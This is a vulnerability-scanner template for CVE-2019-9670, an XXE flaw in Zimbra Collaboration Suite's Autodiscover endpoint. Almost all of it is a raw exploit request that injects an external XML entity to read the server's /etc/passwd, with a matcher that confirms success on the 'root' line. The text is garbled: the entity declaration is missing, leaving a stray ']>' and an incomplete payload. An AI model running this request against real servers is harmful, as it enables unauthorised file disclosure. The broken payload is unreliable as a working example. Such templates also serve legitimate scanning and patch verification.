id: CVE-2019-9670 info: name: Zimbra Collaboration XXE description: Mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML External Entity injection (XXE) vulnerability. author: ree4pwn severity: critical tags: cve,cve2019,zimbra,xxe requests: - raw: - | POST /Autodiscover/Autodiscover.xml HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/xml ]> aaaaa &xxe; matchers: - type: regex regex: - 'root:[x*]:0:0' part: body